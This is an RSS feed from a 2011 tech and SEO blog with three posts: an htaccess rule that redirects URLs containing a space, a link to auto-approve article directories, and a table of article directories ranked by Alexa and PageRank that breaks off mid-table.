<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Timby&#039;s Tech Talk</title>
	<atom:link href="http://www.timbystechtalk.com/index.php/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.timbystechtalk.com</link>
	<description>Tech related blog in easy to understand speak.</description>
	<lastBuildDate>Sat, 10 Sep 2011 10:12:38 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>htaccess redirect url with space</title>
		<link>http://www.timbystechtalk.com/index.php/2011/09/09/htaccess-redirect-url-with-space/</link>
		<comments>http://www.timbystechtalk.com/index.php/2011/09/09/htaccess-redirect-url-with-space/#comments</comments>
		<pubDate>Fri, 09 Sep 2011 17:55:40 +0000</pubDate>
		<dc:creator>Timby</dc:creator>
				<category><![CDATA[Web Programming]]></category>
		<category><![CDATA[htaccess redirects]]></category>

		<guid isPermaLink="false">http://www.timbystechtalk.com/?p=379</guid>
		<description><![CDATA[Ok a super quick post today as I wanted to share this with the world. I had some link building done for me a little while ago and I was just looking over the reports sent back to me. To my horror the links were actually pointing to http://www.mywebsite.com/%20 ! This of course was a [...]]]></description>
			<content:encoded><![CDATA[<p>Ok a super quick post today as I wanted to share this with the world. I had some link building done for me a little while ago and I was just looking over the reports sent back to me. To my horror the links were actually pointing to http://www.mywebsite.com/%20 ! This of course was a 404 as I didn&#8217;t have a page that contained a space at the end of my URL.</p>
<p>There wasn&#8217;t much I could do as this work was completed some time ago so instead of crying about it I thought I would at least try to save some of this missed SEO link juice.</p>
<p>Here is the line I added to my htaccess to avoid at least some of this catastrophe:</p>
<p>Options +FollowSymlinks<br />
RewriteEngine on<br />
Redirect 301 &#8220;/ &#8221; http://www.mysite.com/</p>
<p>This rule simply says that if my website is accessed with a space after the root slash then it will permanently redirect to my homepage.<br />
If you needed a redirect for a page on your site that actually has a space in it you can use this technique as well, for example:</p>
<p>Options +FollowSymlinks<br />
RewriteEngine on</p>
<p>Redirect 301 &#8220;/contact us.html&#8221; http://www.mysite.com/contact.php</p>
<p>I hope this helps some people!</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=htaccess+redirect+url+with+space&amp;link=http://www.timbystechtalk.com/index.php/2011/09/09/htaccess-redirect-url-with-space/&amp;notes=Ok%20a%20super%20quick%20post%20today%20as%20I%20wanted%20to%20share%20this%20with%20the%20world.%20I%20had%20some%20link%20building%20done%20for%20me%20a%20little%20while%20ago%20and%20I%20was%20just%20looking%20over%20the%20reports%20sent%20back%20to%20me.%20To%20my%20horror%20the%20links%20were%20actually%20pointing%20to%20http%3A%2F%2Fwww.mywebsite.com%2F%2520%20%21%20This%20of%20course%20was%20a%20404%20as%20I%20didn%27t%20&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=htaccess+redirect+url+with+space&amp;link=http://www.timbystechtalk.com/index.php/2011/09/09/htaccess-redirect-url-with-space/&amp;notes=Ok%20a%20super%20quick%20post%20today%20as%20I%20wanted%20to%20share%20this%20with%20the%20world.%20I%20had%20some%20link%20building%20done%20for%20me%20a%20little%20while%20ago%20and%20I%20was%20just%20looking%20over%20the%20reports%20sent%20back%20to%20me.%20To%20my%20horror%20the%20links%20were%20actually%20pointing%20to%20http%3A%2F%2Fwww.mywebsite.com%2F%2520%20%21%20This%20of%20course%20was%20a%20404%20as%20I%20didn%27t%20&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=htaccess+redirect+url+with+space&amp;link=http://www.timbystechtalk.com/index.php/2011/09/09/htaccess-redirect-url-with-space/&amp;notes=Ok%20a%20super%20quick%20post%20today%20as%20I%20wanted%20to%20share%20this%20with%20the%20world.%20I%20had%20some%20link%20building%20done%20for%20me%20a%20little%20while%20ago%20and%20I%20was%20just%20looking%20over%20the%20reports%20sent%20back%20to%20me.%20To%20my%20horror%20the%20links%20were%20actually%20pointing%20to%20http%3A%2F%2Fwww.mywebsite.com%2F%2520%20%21%20This%20of%20course%20was%20a%20404%20as%20I%20didn%27t%20&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.shareaholic.com/api/share/?title=htaccess+redirect+url+with+space&amp;link=http://www.timbystechtalk.com/index.php/2011/09/09/htaccess-redirect-url-with-space/&amp;notes=Ok%20a%20super%20quick%20post%20today%20as%20I%20wanted%20to%20share%20this%20with%20the%20world.%20I%20had%20some%20link%20building%20done%20for%20me%20a%20little%20while%20ago%20and%20I%20was%20just%20looking%20over%20the%20reports%20sent%20back%20to%20me.%20To%20my%20horror%20the%20links%20were%20actually%20pointing%20to%20http%3A%2F%2Fwww.mywebsite.com%2F%2520%20%21%20This%20of%20course%20was%20a%20404%20as%20I%20didn%27t%20&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=74&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=htaccess+redirect+url+with+space&amp;link=http://www.timbystechtalk.com/index.php/2011/09/09/htaccess-redirect-url-with-space/&amp;notes=Ok%20a%20super%20quick%20post%20today%20as%20I%20wanted%20to%20share%20this%20with%20the%20world.%20I%20had%20some%20link%20building%20done%20for%20me%20a%20little%20while%20ago%20and%20I%20was%20just%20looking%20over%20the%20reports%20sent%20back%20to%20me.%20To%20my%20horror%20the%20links%20were%20actually%20pointing%20to%20http%3A%2F%2Fwww.mywebsite.com%2F%2520%20%21%20This%20of%20course%20was%20a%20404%20as%20I%20didn%27t%20&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=htaccess+redirect+url+with+space&amp;link=http://www.timbystechtalk.com/index.php/2011/09/09/htaccess-redirect-url-with-space/&amp;notes=Ok%20a%20super%20quick%20post%20today%20as%20I%20wanted%20to%20share%20this%20with%20the%20world.%20I%20had%20some%20link%20building%20done%20for%20me%20a%20little%20while%20ago%20and%20I%20was%20just%20looking%20over%20the%20reports%20sent%20back%20to%20me.%20To%20my%20horror%20the%20links%20were%20actually%20pointing%20to%20http%3A%2F%2Fwww.mywebsite.com%2F%2520%20%21%20This%20of%20course%20was%20a%20404%20as%20I%20didn%27t%20&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-sphinn">
			<a href="http://www.shareaholic.com/api/share/?title=htaccess+redirect+url+with+space&amp;link=http://www.timbystechtalk.com/index.php/2011/09/09/htaccess-redirect-url-with-space/&amp;notes=Ok%20a%20super%20quick%20post%20today%20as%20I%20wanted%20to%20share%20this%20with%20the%20world.%20I%20had%20some%20link%20building%20done%20for%20me%20a%20little%20while%20ago%20and%20I%20was%20just%20looking%20over%20the%20reports%20sent%20back%20to%20me.%20To%20my%20horror%20the%20links%20were%20actually%20pointing%20to%20http%3A%2F%2Fwww.mywebsite.com%2F%2520%20%21%20This%20of%20course%20was%20a%20404%20as%20I%20didn%27t%20&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=100&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Sphinn this on Sphinn">Sphinn this on Sphinn</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=htaccess+redirect+url+with+space&amp;link=http://www.timbystechtalk.com/index.php/2011/09/09/htaccess-redirect-url-with-space/&amp;notes=Ok%20a%20super%20quick%20post%20today%20as%20I%20wanted%20to%20share%20this%20with%20the%20world.%20I%20had%20some%20link%20building%20done%20for%20me%20a%20little%20while%20ago%20and%20I%20was%20just%20looking%20over%20the%20reports%20sent%20back%20to%20me.%20To%20my%20horror%20the%20links%20were%20actually%20pointing%20to%20http%3A%2F%2Fwww.mywebsite.com%2F%2520%20%21%20This%20of%20course%20was%20a%20404%20as%20I%20didn%27t%20&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=htaccess+redirect+url+with+space&amp;link=http://www.timbystechtalk.com/index.php/2011/09/09/htaccess-redirect-url-with-space/&amp;notes=Ok%20a%20super%20quick%20post%20today%20as%20I%20wanted%20to%20share%20this%20with%20the%20world.%20I%20had%20some%20link%20building%20done%20for%20me%20a%20little%20while%20ago%20and%20I%20was%20just%20looking%20over%20the%20reports%20sent%20back%20to%20me.%20To%20my%20horror%20the%20links%20were%20actually%20pointing%20to%20http%3A%2F%2Fwww.mywebsite.com%2F%2520%20%21%20This%20of%20course%20was%20a%20404%20as%20I%20didn%27t%20&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%24%7Btitle%7D+-+%24%7Bshort_link%7D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://www.timbystechtalk.com/index.php/2011/09/09/htaccess-redirect-url-with-space/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>656 Auto Approve article directory sites</title>
		<link>http://www.timbystechtalk.com/index.php/2011/08/23/656-auto-approve-article-directory-sites/</link>
		<comments>http://www.timbystechtalk.com/index.php/2011/08/23/656-auto-approve-article-directory-sites/#comments</comments>
		<pubDate>Tue, 23 Aug 2011 16:46:07 +0000</pubDate>
		<dc:creator>Timby</dc:creator>
				<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://www.timbystechtalk.com/?p=376</guid>
		<description><![CDATA[For those of you that use article directory submissions tools such as Article Marketing Robot you will no doubt appreciate the ease of auto approving article directory sites! Sometimes it is a pain waiting for hours, days and even weeks just in the hopes that your article will be published! So&#8230;here is a solution! Here [...]]]></description>
			<content:encoded><![CDATA[<p>For those of you that use article directory submissions tools such as Article Marketing Robot you will no doubt appreciate the ease of auto approving article directory sites! Sometimes it is a pain waiting for hours, days and even weeks just in the hopes that your article will be published!</p>
<p>So&#8230;here is a solution!</p>
<p>Here is a list of <a href="http://adf.ly/2QqvF" target="_blank">656 Auto approve article directory sites</a> perfect for article submission software!</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=656+Auto+Approve+article+directory+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/08/23/656-auto-approve-article-directory-sites/&amp;notes=For%20those%20of%20you%20that%20use%20article%20directory%20submissions%20tools%20such%20as%20Article%20Marketing%20Robot%20you%20will%20no%20doubt%20appreciate%20the%20ease%20of%20auto%20approving%20article%20directory%20sites%21%20Sometimes%20it%20is%20a%20pain%20waiting%20for%20hours%2C%20days%20and%20even%20weeks%20just%20in%20the%20hopes%20that%20your%20article%20will%20be%20published%21%0D%0A%0D%0ASo...&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=656+Auto+Approve+article+directory+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/08/23/656-auto-approve-article-directory-sites/&amp;notes=For%20those%20of%20you%20that%20use%20article%20directory%20submissions%20tools%20such%20as%20Article%20Marketing%20Robot%20you%20will%20no%20doubt%20appreciate%20the%20ease%20of%20auto%20approving%20article%20directory%20sites%21%20Sometimes%20it%20is%20a%20pain%20waiting%20for%20hours%2C%20days%20and%20even%20weeks%20just%20in%20the%20hopes%20that%20your%20article%20will%20be%20published%21%0D%0A%0D%0ASo...&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=656+Auto+Approve+article+directory+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/08/23/656-auto-approve-article-directory-sites/&amp;notes=For%20those%20of%20you%20that%20use%20article%20directory%20submissions%20tools%20such%20as%20Article%20Marketing%20Robot%20you%20will%20no%20doubt%20appreciate%20the%20ease%20of%20auto%20approving%20article%20directory%20sites%21%20Sometimes%20it%20is%20a%20pain%20waiting%20for%20hours%2C%20days%20and%20even%20weeks%20just%20in%20the%20hopes%20that%20your%20article%20will%20be%20published%21%0D%0A%0D%0ASo...&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.shareaholic.com/api/share/?title=656+Auto+Approve+article+directory+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/08/23/656-auto-approve-article-directory-sites/&amp;notes=For%20those%20of%20you%20that%20use%20article%20directory%20submissions%20tools%20such%20as%20Article%20Marketing%20Robot%20you%20will%20no%20doubt%20appreciate%20the%20ease%20of%20auto%20approving%20article%20directory%20sites%21%20Sometimes%20it%20is%20a%20pain%20waiting%20for%20hours%2C%20days%20and%20even%20weeks%20just%20in%20the%20hopes%20that%20your%20article%20will%20be%20published%21%0D%0A%0D%0ASo...&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=74&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=656+Auto+Approve+article+directory+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/08/23/656-auto-approve-article-directory-sites/&amp;notes=For%20those%20of%20you%20that%20use%20article%20directory%20submissions%20tools%20such%20as%20Article%20Marketing%20Robot%20you%20will%20no%20doubt%20appreciate%20the%20ease%20of%20auto%20approving%20article%20directory%20sites%21%20Sometimes%20it%20is%20a%20pain%20waiting%20for%20hours%2C%20days%20and%20even%20weeks%20just%20in%20the%20hopes%20that%20your%20article%20will%20be%20published%21%0D%0A%0D%0ASo...&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=656+Auto+Approve+article+directory+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/08/23/656-auto-approve-article-directory-sites/&amp;notes=For%20those%20of%20you%20that%20use%20article%20directory%20submissions%20tools%20such%20as%20Article%20Marketing%20Robot%20you%20will%20no%20doubt%20appreciate%20the%20ease%20of%20auto%20approving%20article%20directory%20sites%21%20Sometimes%20it%20is%20a%20pain%20waiting%20for%20hours%2C%20days%20and%20even%20weeks%20just%20in%20the%20hopes%20that%20your%20article%20will%20be%20published%21%0D%0A%0D%0ASo...&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-sphinn">
			<a href="http://www.shareaholic.com/api/share/?title=656+Auto+Approve+article+directory+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/08/23/656-auto-approve-article-directory-sites/&amp;notes=For%20those%20of%20you%20that%20use%20article%20directory%20submissions%20tools%20such%20as%20Article%20Marketing%20Robot%20you%20will%20no%20doubt%20appreciate%20the%20ease%20of%20auto%20approving%20article%20directory%20sites%21%20Sometimes%20it%20is%20a%20pain%20waiting%20for%20hours%2C%20days%20and%20even%20weeks%20just%20in%20the%20hopes%20that%20your%20article%20will%20be%20published%21%0D%0A%0D%0ASo...&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=100&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Sphinn this on Sphinn">Sphinn this on Sphinn</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=656+Auto+Approve+article+directory+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/08/23/656-auto-approve-article-directory-sites/&amp;notes=For%20those%20of%20you%20that%20use%20article%20directory%20submissions%20tools%20such%20as%20Article%20Marketing%20Robot%20you%20will%20no%20doubt%20appreciate%20the%20ease%20of%20auto%20approving%20article%20directory%20sites%21%20Sometimes%20it%20is%20a%20pain%20waiting%20for%20hours%2C%20days%20and%20even%20weeks%20just%20in%20the%20hopes%20that%20your%20article%20will%20be%20published%21%0D%0A%0D%0ASo...&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=656+Auto+Approve+article+directory+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/08/23/656-auto-approve-article-directory-sites/&amp;notes=For%20those%20of%20you%20that%20use%20article%20directory%20submissions%20tools%20such%20as%20Article%20Marketing%20Robot%20you%20will%20no%20doubt%20appreciate%20the%20ease%20of%20auto%20approving%20article%20directory%20sites%21%20Sometimes%20it%20is%20a%20pain%20waiting%20for%20hours%2C%20days%20and%20even%20weeks%20just%20in%20the%20hopes%20that%20your%20article%20will%20be%20published%21%0D%0A%0D%0ASo...&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%24%7Btitle%7D+-+%24%7Bshort_link%7D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://www.timbystechtalk.com/index.php/2011/08/23/656-auto-approve-article-directory-sites/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>50 top Article directories based on PR and Alexa</title>
		<link>http://www.timbystechtalk.com/index.php/2011/08/22/50-top-article-directories-based-on-pr-and-alexa/</link>
		<comments>http://www.timbystechtalk.com/index.php/2011/08/22/50-top-article-directories-based-on-pr-and-alexa/#comments</comments>
		<pubDate>Mon, 22 Aug 2011 16:27:16 +0000</pubDate>
		<dc:creator>Timby</dc:creator>
				<category><![CDATA[SEO]]></category>
		<category><![CDATA[article directories]]></category>
		<category><![CDATA[high pr article directories]]></category>

		<guid isPermaLink="false">http://www.timbystechtalk.com/?p=373</guid>
		<description><![CDATA[If you have been in the SEO game for more than five minutes you have no doubt heard about the wonders of Article Directories. The first directory that comes to mind for most online guru&#8217;s is &#8220;ezine articles&#8221; and whilst this is a fantastic directory (that google really loves) there are many other such places [...]]]></description>
			<content:encoded><![CDATA[<p>If you have been in the SEO game for more than five minutes you have no doubt heard about the wonders of Article Directories. The first directory that comes to mind for most online guru&#8217;s is &#8220;ezine articles&#8221; and whilst this is a fantastic directory (that google really loves) there are many other such places that are also well worth submitting too.</p>
<p>Here is a list of the top 50 article directories based on PR and Alexa rank. Some of this list give no follow links back and some also cost money to submit (denoted by a <span style="color: #cc0000;">$</span>), but all of these are guaranteed to help your website soar up the search engine results pages if you submit quality content and strategically place your link.</p>
<table>
<tbody>
<tr>
<td></td>
<td align="center"><strong><br />
URL</strong></td>
<td align="center"><strong><span style="color: #cc0000;">Alexa<br />
Rating</span></strong></td>
<td align="center"><strong>Google<br />
Pagerank</strong></td>
<td align="center"><strong>No Follow</strong></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">1.</td>
<td align="left"><a href="http://knol.google.com" target="_blank">knol.google.com</a></td>
<td align="right">1</td>
<td align="center">7</td>
<td style="color: #cc0000;" align="center">NF!</td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">2.</td>
<td align="left"><a href="http://www.ehow.com" target="_blank">ehow.com</a></td>
<td align="right">141</td>
<td align="center">7</td>
<td style="color: #cc0000;" align="center">NF!</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">3.</td>
<td align="left"><a href="http://www.squidoo.com" target="_blank">squidoo.com</a></td>
<td align="right">218</td>
<td align="center">7</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">4.</td>
<td align="left"><a href="http://www.ezinearticles.com" target="_blank">ezinearticles.com</a></td>
<td align="right">234</td>
<td align="center">6</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">5.</td>
<td align="left"><a href="http://www.hubpages.com" target="_blank">hubpages.com</a></td>
<td align="right">339</td>
<td align="center">6</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">6.</td>
<td align="left"><a href="http://www.articlesbase.com" target="_blank">articlesbase.com</a></td>
<td align="right">742</td>
<td align="center">6</td>
<td style="color: #cc0000;" align="center">NF!</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">7.</td>
<td align="left"><a href="http://www.examiner.com" target="_blank">examiner.com</a></td>
<td align="right">782</td>
<td align="center">7</td>
<td style="color: #cc0000;" align="center">NF!</td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">8.</td>
<td align="left"><a href="http://www.technorati.com" target="_blank">technorati.com</a></td>
<td align="right">935</td>
<td align="center">8</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">9.</td>
<td align="left"><a href="http://www.associatedcontent.com" target="_blank">associatedcontent.com</a></td>
<td align="right">1,306</td>
<td align="center">7</td>
<td style="color: #cc0000;" align="center">NF!</td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">10.</td>
<td align="left"><a href="http://www.buzzle.com" target="_blank">buzzle.com</a></td>
<td align="right">1,331</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">11.</td>
<td align="left"><a href="http://www.seekingalpha.com" target="_blank">seekingalpha.com</a></td>
<td align="right">1,379</td>
<td align="center">7</td>
<td style="color: #cc0000;" align="center">NF!</td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">12.</td>
<td align="left"><a href="http://www.goarticles.com" target="_blank">goarticles.com</a></td>
<td align="right">1,954</td>
<td align="center">3</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">13.</td>
<td align="left"><a href="http://www.suite101.com" target="_blank">suite101.com</a></td>
<td align="right">2,034</td>
<td align="center">7</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">14.</td>
<td align="left"><a href="http://www.gather.com" target="_blank">gather.com</a></td>
<td align="right">2,237</td>
<td align="center">6</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">15.</td>
<td align="left"><a href="http://www.brighthub.com" target="_blank">brighthub.com</a></td>
<td align="right">2,346</td>
<td align="center">6</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">16.</td>
<td align="left"><a href="http://www.helium.com" target="_blank">helium.com</a></td>
<td align="right">2,874</td>
<td align="center">6</td>
<td style="color: #cc0000;" align="center">NF!</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">17.</td>
<td align="left"><a href="http://www.ezinemark.com" target="_blank">ezinemark.com</a></td>
<td align="right">2,934</td>
<td align="center">3</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">18.</td>
<td align="left"><a href="http://www.articlesnatch.com" target="_blank">articlesnatch.com</a></td>
<td align="right">3,511</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center">NF!</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">19.</td>
<td align="left"><a href="http://www.pubarticles.com" target="_blank">pubarticles.com</a></td>
<td align="right">3,538</td>
<td align="center">4</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">20.</td>
<td align="left"><a href="http://www.selfgrowth.com" target="_blank">selfgrowth.com</a></td>
<td align="right">3,667</td>
<td align="center">6</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">21.</td>
<td align="left"><a href="http://www.articlealley.com" target="_blank">articlealley.com</a></td>
<td align="right">3,889</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center">NF!</td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">22.</td>
<td align="left"><a href="http://www.sooperarticles.com" target="_blank">sooperarticles.com</a></td>
<td align="right">3,939</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">23.</td>
<td align="left"><a href="http://www.ideamarketers.com" target="_blank">ideamarketers.com</a></td>
<td align="right">4,078</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">24.</td>
<td align="left"><a href="http://www.amazines.com" target="_blank">amazines.com</a></td>
<td align="right">4,561</td>
<td align="center">3</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">25.</td>
<td align="left"><a href="http://www.bukisa.com" target="_blank">bukisa.com</a></td>
<td align="right">4,878</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center">NF!</td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">26.</td>
<td align="left"><a href="http://www.thefreelibrary.com" target="_blank">thefreelibrary.com</a></td>
<td align="right">4,940</td>
<td align="center">7</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">27.</td>
<td align="left"><a href="http://www.infobarrel.com" target="_blank">infobarrel.com</a></td>
<td align="right">5,252</td>
<td align="center">4</td>
